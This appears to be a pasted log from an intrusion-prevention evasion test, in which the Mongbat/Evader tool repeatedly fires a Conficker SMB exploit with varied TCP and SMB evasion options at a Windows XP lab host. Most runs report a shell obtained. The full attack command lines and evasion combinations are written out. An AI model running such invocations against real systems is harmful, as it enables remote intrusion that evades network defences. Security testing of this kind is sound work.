  6029. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30391 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=hCXgqyW1xgM --evasion=[smb_opentree,smb_openpipe]smb_writeandxpad,"6","random_alphanum" --evasion=[smb_openpipe,end]tcp_overlap,"4","new","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"75%","6247869","alphanumrandomized" --verifydelay=1000 --payload=shell
  6030. Info: Using random seed hCXgqyW1xgO
  6031. The following evasions are applied from stage smb_connect to msrpc_req:
  6032. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6247869> and has original payload with alphanumeric bytes randomized
  6033. The following evasions are applied from stage smb_opentree to smb_openpipe:
  6034. - 6 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  6035. The following evasions are applied from stage smb_openpipe to end:
  6036. - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  6037.  
  6038. Info: NetBIOS connection 10.62.90.116:30391 -> 10.35.1.207:445
  6039. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  6040. Info: Sending MSRPC request with exploit
  6041. Info: Shell found, attack succeeded
  6042. Info: Shell closed
  6043. 0: Success.
  6044. .....
  6045. 10001 runs averaging 1.87 runs / second ; progress: 5359/43200.....2015-06-08 00:48:50 INFO
  6046. Success. (10.62.90.111):
  6047. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39260 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=aglHj0x7Asw --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"25%","chksum|nullchksum|nullflag|outofwindow|shorthdr","unmodified" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","5","random_alpha" --verifydelay=1000 --payload=shell
  6048. Info: Using random seed aglHj0x7Asx
  6049. The following evasions are applied from stage smb_opentree to smb_openpipe:
  6050.  
  6051. The following evasions are applied from stage smb_opentree to msrpc_req:
  6052. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alpha bytes as payload
  6053.  
  6054. Info: NetBIOS connection 10.62.90.111:39260 -> 10.35.1.207:445
  6055. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  6056. Info: Sending MSRPC request with exploit
  6057. Info: Shell found, attack succeeded
  6058. Info: Shell closed
  6059. 0: Success.
  6060. .2015-06-08 00:48:51 INFO
  6061. Success. (10.62.90.116):
  6062. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54804 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=hoHhi2FG8pI --evasion=[smb_connect,smb_openpipe]tcp_chaff,"3","chksum","zero" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","7","shuffle" --verifydelay=1000 --payload=shell
  6063. Info: Using random seed hoHhi2FG8pK
  6064. The following evasions are applied from stage smb_connect to smb_openpipe:
  6065. - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
  6066. * Invalid TCP checksum.
  6067. * Duplicate packet has 0x00 bytes as payload
  6068. The following evasions are applied from stage smb_opentree to msrpc_req:
  6069. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has shuffled original payload
  6070.  
  6071. Info: NetBIOS connection 10.62.90.116:54804 -> 10.35.1.207:445
  6072. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  6073. Info: Sending MSRPC request with exploit
  6074. Info: Shell found, attack succeeded
  6075. Info: CommandShell::SendCommand() - Failed to send string
  6076. Info: Command shell connection reset.
  6077. Info: Shell closed
  6078. 0: Success.
  6079. ........
  6080. 10017 runs averaging 1.87 runs / second ; progress: 5364/43200.............
  6081. 10030 runs averaging 1.87 runs / second ; progress: 5369/43200..........
  6082. 10040 runs averaging 1.87 runs / second ; progress: 5374/43200.....
  6083. 10045 runs averaging 1.87 runs / second ; progress: 5379/43200....
  6084. 10049 runs averaging 1.87 runs / second ; progress: 5384/43200.....
  6085. 10054 runs averaging 1.87 runs / second ; progress: 5389/43200..........Pid 18512 timed out - killed
  6086. 2015-06-08 00:49:22 INFO
  6087. Timed out (10.62.90.113):
  6088. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29691 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=UepWOS12Ry4 --evasion=[msrpc_bind,end]ipv4_opt,"1","inc","unmodified" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  6089. Info: Using random seed UepWOS12Ry5
  6090. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  6091. - 75% probability to add a random urgent data byte to a TCP segment.
  6092. The following evasions are applied from stage msrpc_bind to end:
  6093. - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  6094. The duplicate packet has identical payload
  6095.  
  6096. Info: NetBIOS connection 10.62.90.113:29691 -> 10.35.1.207:445
  6097. Terminated
  6098. .....
  6099. 10070 runs averaging 1.87 runs / second ; progress: 5394/43200..............2015-06-08 00:49:27 INFO
  6100. Success. (10.62.90.116):
  6101. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23791 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=vvbQ2wZqrA4 --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"7","4","7","random" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","3","7","random_msrpcreq" --verifydelay=1000 --payload=shell
  6102. Info: Using random seed vvbQ2wZqrA6
  6103. The following evasions are applied from stage smb_opentree to msrpc_bind:
  6104. - Before normal SMB writes, 7 SMB trees are opened and 4 writes are performed to them. The write payload is 7 random bytes.
  6105. The following evasions are applied from stage smb_opentree to msrpc_req:
  6106. - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
  6107.  
  6108. Info: NetBIOS connection 10.62.90.116:23791 -> 10.35.1.207:445
  6109. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  6110. Info: Sending MSRPC request with exploit
  6111. Info: Shell found, attack succeeded
  6112. Info: Shell closed
  6113. 0: Success.
  6114. ...
  6115. 10088 runs averaging 1.87 runs / second ; progress: 5399/43200.................
  6116. 10105 runs averaging 1.87 runs / second ; progress: 5404/43200...........
  6117. 10116 runs averaging 1.87 runs / second ; progress: 5409/43200........
  6118. 10124 runs averaging 1.87 runs / second ; progress: 5414/43200..2015-06-08 00:49:47 INFO
  6119. Success. (10.62.90.111):
  6120. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37811 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=rAdEwDS3pbY --evasion=[msrpc_bind,end]smb_decoytrees,"4","2","8","random_msrpcreq" --evasion=[netbios_connect,msrpc_req]tcp_chaff,"25%","nullflag|outofwindow|shorthdr","random_alpha" --verifydelay=1000 --payload=shell
  6121. Info: Using random seed rAdEwDS3pba
  6122. The following evasions are applied from stage netbios_connect to msrpc_req:
  6123. - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  6124. * NULL TCP control flags.
  6125. * An out-of-window sequence number.
  6126. * TCP header shorter than 20 bytes
  6127. * Duplicate packet has random alpha bytes as payload
  6128. The following evasions are applied from stage msrpc_bind to end:
  6129. - Before normal SMB writes, 4 SMB trees are opened and 2 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
  6130.  
  6131. Info: NetBIOS connection 10.62.90.111:37811 -> 10.35.1.207:445
  6132. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  6133. Info: Sending MSRPC request with exploit
  6134. Info: Shell found, attack succeeded
  6135. Info: Shell closed
  6136. 0: Success.
  6137. .......
  6138. 44283 runs averaging 1.73 runs / second ; progress: 25593/432002015-06-08 06:26:03 INFO
  6139. Success. (10.62.90.114):
  6140. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33396 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=SlCGLlc3zX8 --evasion=[smb_openpipe,msrpc_req]smb_writeandxpad,"3","random_alphanum" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"25%","7","random" --verifydelay=1000 --payload=shell
  6141. Info: Using random seed SlCGLlc3zX9
  6142. The following evasions are applied from stage smb_openpipe to msrpc_req:
  6143. - 3 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  6144. The following evasions are applied from stage msrpc_bind to msrpc_req:
  6145. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has random bytes as payload
  6146.  
  6147. Info: NetBIOS connection 10.62.90.114:33396 -> 10.35.1.207:445
  6148. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  6149. Info: Sending MSRPC request with exploit
  6150. Info: Shell found, attack succeeded
  6151. Info: Shell closed
  6152. 0: Success.
  6153. .....
  6154. 4550874 runs averaging 12.76 runs / second ; progress: 43175/43200.............................................................................................................................................................
  6155. 551031 runs averaging 12.76 runs / second ; progress: 43181/43200...................................................................................................................................
  6156. 551162 runs averaging 12.76 runs / second ; progress: 43187/43200...................................................................................................................................
  6157. 551293 runs averaging 12.76 runs / second ; progress: 43194/43200..................................................................................................................................
  6158. 2015-06-08 11:19:31 INFO Done.
  6159. Printing test result
  6160. 2015-06-08 11:19:32 INFO Mongbat test report
  6161.  
  6162. Using /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
  6163.  
  6164. Started : 2015-06-07 23:19:29 +0300
  6165. Finished: 2015-06-08 11:19:31 +0300
  6166. Log
  6167. close
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!